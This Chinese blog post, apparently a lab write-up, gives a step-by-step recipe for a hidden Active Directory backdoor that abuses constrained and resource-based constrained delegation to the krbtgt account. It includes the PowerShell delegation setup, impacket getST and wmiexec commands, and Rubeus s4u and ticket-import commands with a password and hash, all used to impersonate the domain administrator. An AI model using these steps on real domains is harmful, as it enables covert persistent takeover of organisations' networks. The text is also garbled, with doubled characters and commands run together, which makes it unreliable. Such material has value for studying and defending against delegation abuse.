內(nèi)網(wǎng)滲透 | 利用委派打造隱蔽后門(權(quán)限維持)

利用約束性委派打造隱蔽后門(權(quán)限維持)
我們控制的用戶選擇的是自己創(chuàng)建的?test 域用戶。
·?域控:win2008 ?192.168.10.131
·?域:xie.com
·?攻擊機:Kali
首先修改?kali 的/etc/hosts/文件,添加如下內(nèi)容
192.168.10.131 win2008192.168.10.131 xie.com
然后在域控上配置test用戶到krbtgt用戶的約束性委派。?


在Kali上進行攻擊
./getST.py -dc-ip 192.168.10.131 -spn krbtgt/XIE.COM -impersonate administrator xie.com/test:x123456.\/export KRB5CCNAME=administrator.ccache./wmiexec.py -no-pass -k administrator@win2008 -dc-ip 192.168.10.131


利用基于資源的約束委派打造隱蔽后門(權(quán)限維持)
·?域控:Win2012 ??192.168.10.24
·?域成員主機:Win7 ?192.168.10.130
·?普通域用戶:xie\hack
首先修改?kali 的/etc/hosts/文件,添加如下內(nèi)容
192.168.10.24 win2012
192.168.10.24 xie.com
配置基于資源的約束委派
這里我們用剛剛新建的test用戶作為服務(wù)A,配置用戶 test 到 krbtgt 的基于資源的約束委派
Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount testGet-ADUser krbtgt -Properties PrincipalsAllowedToDelegateToAccount

在Kali上使用impacket進行攻擊
./getST.py -dc-ip 192.168.10.24 -spn krbtgt -impersonate administrator xie.com/test:x123456.\/export KRB5CCNAME=administrator.ccache./wmiexec.py -no-pass -k administrator@win2012 -dc-ip 192.168.10.24

在Win7上使用Rubeus進行攻擊
現(xiàn)在我們在Win7上用普通域用戶 xie\hack 使用Rubeus進行基于資源的約束性委派攻擊
這下面的rc4是剛剛新建的test用戶的密碼哈希,我們也可以使用aes256來進行認證。服務(wù)我們設(shè)置為 krbtgt
Rubeus.exe s4u /user:test /rc4:b98e75b5ff7a3d3ff05e07f211ebe7a8 /domain:xie.com /msdsspn:krbtgt /impersonateuser:administrator


導(dǎo)入票據(jù),訪問域控
Rubeus.exe ptt /ticket:票據(jù)
參考文章:https://www.anquanke.com/post/id/170535

來源:謝公子的博客
責(zé)編:涼粉






評論
圖片
表情







